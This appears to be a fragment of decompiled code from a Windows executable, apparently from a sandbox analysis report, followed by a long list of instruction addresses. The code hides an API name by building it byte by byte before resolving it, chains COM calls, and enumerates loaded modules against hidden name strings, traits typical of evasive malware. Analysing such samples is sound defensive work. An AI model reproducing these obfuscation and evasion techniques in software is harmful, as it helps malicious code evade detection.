                                                                                                                                                                                                    						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                    						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                    						_t563 = _t562 + 8;
                                                                                                                                                                                                    						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                    						__eflags = _t367;
                                                                                                                                                                                                    						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                    						__eflags = _t452;
                                                                                                                                                                                                    						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                    						 *0x423480 = _t367;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                    						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                    						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                    						__eflags = _t452;
                                                                                                                                                                                                    						if(_t452 != 0) {
                                                                                                                                                                                                    							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                    							__eflags = _t368;
                                                                                                                                                                                                    							if(_t368 >= 0) {
                                                                                                                                                                                                    								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                    								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                    									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                    									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                    									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                    									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                    									__eflags = _t378;
                                                                                                                                                                                                    									if(_t378 >= 0) {
                                                                                                                                                                                                    										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                    										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                    										__eflags = _t383;
                                                                                                                                                                                                    										if(_t383 >= 0) {
                                                                                                                                                                                                    											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                    											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                    											__eflags = _t385;
                                                                                                                                                                                                    											if(_t385 >= 0) {
                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                    												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                    												_t539 = __imp__#8;
                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                    												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                    												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                    												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                    												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                    												__eflags = _t542;
                                                                                                                                                                                                    												if(_t542 == 0) {
                                                                                                                                                                                                    													E0040AD90(0x80004003);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                    												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                    												_t543 = _t396;
                                                                                                                                                                                                    												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                    												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                    												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                    												_t564 = _t563 + 0xc;
                                                                                                                                                                                                    												__imp__#24(_t543);
                                                                                                                                                                                                    												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                    												__eflags = _t399;
                                                                                                                                                                                                    												if(_t399 == 0) {
                                                                                                                                                                                                    													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                    												__eflags = _t543;
                                                                                                                                                                                                    												if(_t543 != 0) {
                                                                                                                                                                                                    													__imp__#16(_t543);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                    												__eflags = _t402;
                                                                                                                                                                                                    												if(_t402 == 0) {
                                                                                                                                                                                                    													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                    												_t555 = _t402;
                                                                                                                                                                                                    												__eflags = _t469;
                                                                                                                                                                                                    												if(_t469 == 0) {
                                                                                                                                                                                                    													_t531 = 0;
                                                                                                                                                                                                    													__eflags = 0;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t531 =  *_t469;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                    												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                    												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                    												__eflags = _t471;
                                                                                                                                                                                                    												if(_t471 == 0) {
                                                                                                                                                                                                    													E0040AD90(0x80004003);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                    												__eflags = _t405;
                                                                                                                                                                                                    												if(_t405 == 0) {
                                                                                                                                                                                                    													_t514 = 0;
                                                                                                                                                                                                    													__eflags = 0;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t514 =  *_t405;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t563 = _t564 - 0x10;
                                                                                                                                                                                                    												_t407 = _t563;
                                                                                                                                                                                                    												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                    												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                    												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                    												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                    												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                    												_t538 = __imp__#9; // 0x742dcf00
                                                                                                                                                                                                    												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                    												E004019A0(_t563 + 0x38);
                                                                                                                                                                                                    												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                    												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                    												__eflags = _t413;
                                                                                                                                                                                                    												if(_t413 != 0) {
                                                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                    												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                    												__eflags = _t415;
                                                                                                                                                                                                    												if(_t415 != 0) {
                                                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                    									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                    										_push(_t379);
                                                                                                                                                                                                    										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                    										_t563 = _t563 + 4;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                    							__eflags = _t369;
                                                                                                                                                                                                    							if(_t369 != 0) {
                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                    							__eflags = _t370;
                                                                                                                                                                                                    							if(_t370 != 0) {
                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L80;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                    						_t565 = _t557 + 8;
                                                                                                                                                                                                    						_t547 = _t428;
                                                                                                                                                                                                    						_t520 = _t565 + 0x298;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t429 =  *_t520;
                                                                                                                                                                                                    							if(_t429 !=  *_t547) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t429 == 0) {
                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                    								_t429 = 0;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                    								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t520 = _t520 + 2;
                                                                                                                                                                                                    									_t547 = _t547 + 2;
                                                                                                                                                                                                    									if(_t493 != 0) {
                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L7;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							if(_t429 != 0) {
                                                                                                                                                                                                    								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                    								_t557 = _t565 + 8;
                                                                                                                                                                                                    								_t548 = _t431;
                                                                                                                                                                                                    								_t488 = _t557 + 0x298;
                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                    									_t432 =  *_t488;
                                                                                                                                                                                                    									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                    									if(_t432 !=  *_t548) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t432;
                                                                                                                                                                                                    									if(_t432 == 0) {
                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                    										_t432 = 0;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                    										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                    										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                    											break;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t488 = _t488 + 2;
                                                                                                                                                                                                    											_t548 = _t548 + 2;
                                                                                                                                                                                                    											__eflags = _t432;
                                                                                                                                                                                                    											if(_t432 != 0) {
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L18:
                                                                                                                                                                                                    									__eflags = _t432;
                                                                                                                                                                                                    									if(_t432 == 0) {
                                                                                                                                                                                                    										goto L10;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                    										__eflags = _t435;
                                                                                                                                                                                                    										if(_t435 != 0) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                    												_t566 = _t557 + 8;
                                                                                                                                                                                                    												_t549 = _t437;
                                                                                                                                                                                                    												_t490 = _t566 + 0x298;
                                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                                    													_t438 =  *_t490;
                                                                                                                                                                                                    													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                    													if(_t438 !=  *_t549) {
                                                                                                                                                                                                    														break;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t438;
                                                                                                                                                                                                    													if(_t438 == 0) {
                                                                                                                                                                                                    														L26:
                                                                                                                                                                                                    														_t438 = 0;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                    														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                    														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                    															break;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t490 = _t490 + 2;
                                                                                                                                                                                                    															_t549 = _t549 + 2;
                                                                                                                                                                                                    															__eflags = _t438;
                                                                                                                                                                                                    															if(_t438 != 0) {
                                                                                                                                                                                                    																continue;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																goto L26;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													L28:
                                                                                                                                                                                                    													__eflags = _t438;
                                                                                                                                                                                                    													if(_t438 == 0) {
                                                                                                                                                                                                    														goto L10;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                    														_t557 = _t566 + 8;
                                                                                                                                                                                                    														_t550 = _t439;
                                                                                                                                                                                                    														_t492 = _t557 + 0x298;
                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                    															_t440 =  *_t492;
                                                                                                                                                                                                    															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                    															if(_t440 !=  *_t550) {
                                                                                                                                                                                                    																break;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															__eflags = _t440;
                                                                                                                                                                                                    															if(_t440 == 0) {
                                                                                                                                                                                                    																L34:
                                                                                                                                                                                                    																_t440 = 0;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                    																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                    																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                    																	break;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t492 = _t492 + 2;
                                                                                                                                                                                                    																	_t550 = _t550 + 2;
                                                                                                                                                                                                    																	__eflags = _t440;
                                                                                                                                                                                                    																	if(_t440 != 0) {
                                                                                                                                                                                                    																		continue;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		goto L34;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															L36:
                                                                                                                                                                                                    															__eflags = _t440;
                                                                                                                                                                                                    															if(_t440 == 0) {
                                                                                                                                                                                                    																goto L10;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																goto L37;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L81;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														asm("sbb eax, eax");
                                                                                                                                                                                                    														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                    														goto L36;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													goto L81;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												asm("sbb eax, eax");
                                                                                                                                                                                                    												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                    												goto L28;
                                                                                                                                                                                                    												L37:
                                                                                                                                                                                                    												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                    												__eflags = _t442;
                                                                                                                                                                                                    											} while (_t442 != 0);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L38;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L81;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								CloseHandle(_t525);
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L81;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                                                    						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L81:
                                                                                                                                                                                                    			}

































































































                                                                                                                                                                                                    0x004019f0
                                                                                                                                                                                                    0x004019f0
                                                                                                                                                                                                    0x004019fd
                                                                                                                                                                                                    0x00401a10
                                                                                                                                                                                                    0x00401a15
                                                                                                                                                                                                    0x00401a1a
                                                                                                                                                                                                    0x00401a1f
                                                                                                                                                                                                    0x00401a24
                                                                                                                                                                                                    0x00401a29
                                                                                                                                                                                                    0x00401a2e
                                                                                                                                                                                                    0x00401a33
                                                                                                                                                                                                    0x00401a38
                                                                                                                                                                                                    0x00401a3d
                                                                                                                                                                                                    0x00401a42
                                                                                                                                                                                                    0x00401a47
                                                                                                                                                                                                    0x00401a4c
                                                                                                                                                                                                    0x00401a51
                                                                                                                                                                                                    0x00401a56
                                                                                                                                                                                                    0x00401a5b
                                                                                                                                                                                                    0x00401a60
                                                                                                                                                                                                    0x00401a65
                                                                                                                                                                                                    0x00401a6a
                                                                                                                                                                                                    0x00401a6f
                                                                                                                                                                                                    0x00401a74
                                                                                                                                                                                                    0x00401a79
                                                                                                                                                                                                    0x00401a7e
                                                                                                                                                                                                    0x00401a83
                                                                                                                                                                                                    0x00401a88
                                                                                                                                                                                                    0x00401a8d
                                                                                                                                                                                                    0x00401a92
                                                                                                                                                                                                    0x00401a97
                                                                                                                                                                                                    0x00401a9c
                                                                                                                                                                                                    0x00401aa1
                                                                                                                                                                                                    0x00401aa6
                                                                                                                                                                                                    0x00401aab
                                                                                                                                                                                                    0x00401ab0
                                                                                                                                                                                                    0x00401ab9
                                                                                                                                                                                                    0x00401aba
                                                                                                                                                                                                    0x00401abf
                                                                                                                                                                                                    0x00401ac7
                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                    0x00402496
                                                                                                                                                                                                    0x00401acd
                                                                                                                                                                                                    0x00401ad6
                                                                                                                                                                                                    0x00401ae2
                                                                                                                                                                                                    0x00401ae6
                                                                                                                                                                                                    0x00401af1
                                                                                                                                                                                                    0x00401af6
                                                                                                                                                                                                    0x00401afb
                                                                                                                                                                                                    0x00401b00
                                                                                                                                                                                                    0x00401b05
                                                                                                                                                                                                    0x00401b0a
                                                                                                                                                                                                    0x00401b0f
                                                                                                                                                                                                    0x00401b14
                                                                                                                                                                                                    0x00401b19
                                                                                                                                                                                                    0x00401b1e
                                                                                                                                                                                                    0x00401b23
                                                                                                                                                                                                    0x00401b28
                                                                                                                                                                                                    0x00401b2d
                                                                                                                                                                                                    0x00401b32
                                                                                                                                                                                                    0x00401b37
                                                                                                                                                                                                    0x00401b3c
                                                                                                                                                                                                    0x00401b41
                                                                                                                                                                                                    0x00401b46
                                                                                                                                                                                                    0x00401b4b
                                                                                                                                                                                                    0x00401b50
                                                                                                                                                                                                    0x00401b55
                                                                                                                                                                                                    0x00401b5a
                                                                                                                                                                                                    0x00401b5f
                                                                                                                                                                                                    0x00401b64
                                                                                                                                                                                                    0x00401b69
                                                                                                                                                                                                    0x00401b6e
                                                                                                                                                                                                    0x00401b73
                                                                                                                                                                                                    0x00401b78
                                                                                                                                                                                                    0x00401b7d
                                                                                                                                                                                                    0x00401b85
                                                                                                                                                                                                    0x00401b8d
                                                                                                                                                                                                    0x00401b95
                                                                                                                                                                                                    0x00401b9d
                                                                                                                                                                                                    0x00401ba4
                                                                                                                                                                                                    0x00401ba9
                                                                                                                                                                                                    0x00401bae
                                                                                                                                                                                                    0x00401bb3
                                                                                                                                                                                                    0x00401bb8
                                                                                                                                                                                                    0x00401bbd
                                                                                                                                                                                                    0x00401bc2
                                                                                                                                                                                                    0x00401bc7
                                                                                                                                                                                                    0x00401bcc
                                                                                                                                                                                                    0x00401bd1
                                                                                                                                                                                                    0x00401bd6
                                                                                                                                                                                                    0x00401bdb
                                                                                                                                                                                                    0x00401be0
                                                                                                                                                                                                    0x00401be5
                                                                                                                                                                                                    0x00401bea
                                                                                                                                                                                                    0x00401bef
                                                                                                                                                                                                    0x00401bf4
                                                                                                                                                                                                    0x00401bf9
                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                    0x00401c03
                                                                                                                                                                                                    0x00401c08
                                                                                                                                                                                                    0x00401c0d
                                                                                                                                                                                                    0x00401c12
                                                                                                                                                                                                    0x00401c17
                                                                                                                                                                                                    0x00401c1c
                                                                                                                                                                                                    0x00401c21
                                                                                                                                                                                                    0x00401c26
                                                                                                                                                                                                    0x00401c2b
                                                                                                                                                                                                    0x00401c30
                                                                                                                                                                                                    0x00401c35
                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                    0x00401c3f
                                                                                                                                                                                                    0x00401c44
                                                                                                                                                                                                    0x00401c48
                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                    0x00401dc4
                                                                                                                                                                                                    0x00401de0
                                                                                                                                                                                                    0x00401de2
                                                                                                                                                                                                    0x00401de7
                                                                                                                                                                                                    0x00401dec
                                                                                                                                                                                                    0x00401df1
                                                                                                                                                                                                    0x00401df6
                                                                                                                                                                                                    0x00401dfb
                                                                                                                                                                                                    0x00401e00
                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                    0x00401e0a
                                                                                                                                                                                                    0x00401e0f
                                                                                                                                                                                                    0x00401e14
                                                                                                                                                                                                    0x00401e19
                                                                                                                                                                                                    0x00401e1e
                                                                                                                                                                                                    0x00401e23
                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                    0x00401e2d
                                                                                                                                                                                                    0x00401e32
                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                    0x00401e3c
                                                                                                                                                                                                    0x00401e41
                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                    0x00401e4b
                                                                                                                                                                                                    0x00401e50
                                                                                                                                                                                                    0x00401e55
                                                                                                                                                                                                    0x00401e5a
                                                                                                                                                                                                    0x00401e5f
                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                    0x00401e69
                                                                                                                                                                                                    0x00401e6e
                                                                                                                                                                                                    0x00401e73
                                                                                                                                                                                                    0x00401e78
                                                                                                                                                                                                    0x00401e7d
                                                                                                                                                                                                    0x00401e82
                                                                                                                                                                                                    0x00401e86
                                                                                                                                                                                                    0x00401e8b
                                                                                                                                                                                                    0x00401e96
                                                                                                                                                                                                    0x00401e9a
                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                    0x00401eaf
                                                                                                                                                                                                    0x00401eba
                                                                                                                                                                                                    0x00401ebf
                                                                                                                                                                                                    0x00401ec4
                                                                                                                                                                                                    0x00401ec6
                                                                                                                                                                                                    0x00401ecb
                                                                                                                                                                                                    0x00401ece
                                                                                                                                                                                                    0x00401ed2
                                                                                                                                                                                                    0x00401ed4
                                                                                                                                                                                                    0x00401eef
                                                                                                                                                                                                    0x00401ed6
                                                                                                                                                                                                    0x00401edd
                                                                                                                                                                                                    0x00401ee2
                                                                                                                                                                                                    0x00401ee6
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401ef7
                                                                                                                                                                                                    0x00401efc
                                                                                                                                                                                                    0x00401f02
                                                                                                                                                                                                    0x00401f08
                                                                                                                                                                                                    0x00401f0c
                                                                                                                                                                                                    0x00401f15
                                                                                                                                                                                                    0x00401f18
                                                                                                                                                                                                    0x00401f1a
                                                                                                                                                                                                    0x00401f1c
                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                    0x00401f24
                                                                                                                                                                                                    0x00401f28
                                                                                                                                                                                                    0x00401f2f
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f40
                                                                                                                                                                                                    0x00401f45
                                                                                                                                                                                                    0x00401f4a
                                                                                                                                                                                                    0x00401f4b
                                                                                                                                                                                                    0x00401f50
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                    0x00401f69
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                    0x00401f73
                                                                                                                                                                                                    0x00401f75
                                                                                                                                                                                                    0x00401f7b
                                                                                                                                                                                                    0x00401f80
                                                                                                                                                                                                    0x00401f81
                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                    0x00401f8c
                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                    0x00401f9d
                                                                                                                                                                                                    0x00401fa2
                                                                                                                                                                                                    0x00401fa6
                                                                                                                                                                                                    0x00401fac
                                                                                                                                                                                                    0x00401faf
                                                                                                                                                                                                    0x00401fb6
                                                                                                                                                                                                    0x00401fbf
                                                                                                                                                                                                    0x00401fc4
                                                                                                                                                                                                    0x00401fc8
                                                                                                                                                                                                    0x00401fce
                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                    0x00401fe0
                                                                                                                                                                                                    0x00401fec
                                                                                                                                                                                                    0x00401ffe
                                                                                                                                                                                                    0x00402001
                                                                                                                                                                                                    0x00402006
                                                                                                                                                                                                    0x0040200b
                                                                                                                                                                                                    0x00402010
                                                                                                                                                                                                    0x00402015
                                                                                                                                                                                                    0x0040201a
                                                                                                                                                                                                    0x0040201f
                                                                                                                                                                                                    0x00402024
                                                                                                                                                                                                    0x00402029
                                                                                                                                                                                                    0x0040202e
                                                                                                                                                                                                    0x00402033
                                                                                                                                                                                                    0x00402038
                                                                                                                                                                                                    0x0040203d
                                                                                                                                                                                                    0x00402042
                                                                                                                                                                                                    0x00402047
                                                                                                                                                                                                    0x0040204c
                                                                                                                                                                                                    0x00402051
                                                                                                                                                                                                    0x00402056
                                                                                                                                                                                                    0x0040205b
                                                                                                                                                                                                    0x00402060
                                                                                                                                                                                                    0x00402065
                                                                                                                                                                                                    0x0040206a
                                                                                                                                                                                                    0x0040206f
                                                                                                                                                                                                    0x00402074
                                                                                                                                                                                                    0x00402079
                                                                                                                                                                                                    0x0040207e
                                                                                                                                                                                                    0x00402083
                                                                                                                                                                                                    0x00402088
                                                                                                                                                                                                    0x0040208d
                                                                                                                                                                                                    0x00402092
                                                                                                                                                                                                    0x00402097
                                                                                                                                                                                                    0x0040209c
                                                                                                                                                                                                    0x004020a1
                                                                                                                                                                                                    0x004020a5
                                                                                                                                                                                                    0x004020aa
                                                                                                                                                                                                    0x004020ae
                                                                                                                                                                                                    0x004020b4
                                                                                                                                                                                                    0x004020b6
                                                                                                                                                                                                    0x004020bb
                                                                                                                                                                                                    0x004020c0
                                                                                                                                                                                                    0x004020c5
                                                                                                                                                                                                    0x004020ca
                                                                                                                                                                                                    0x004020cf
                                                                                                                                                                                                    0x004020d4
                                                                                                                                                                                                    0x004020e1
                                                                                                                                                                                                    0x004020e6
                                                                                                                                                                                                    0x004020eb
                                                                                                                                                                                                    0x004020f0
                                                                                                                                                                                                    0x004020f5
                                                                                                                                                                                                    0x004020fa
                                                                                                                                                                                                    0x004020ff
                                                                                                                                                                                                    0x00402104
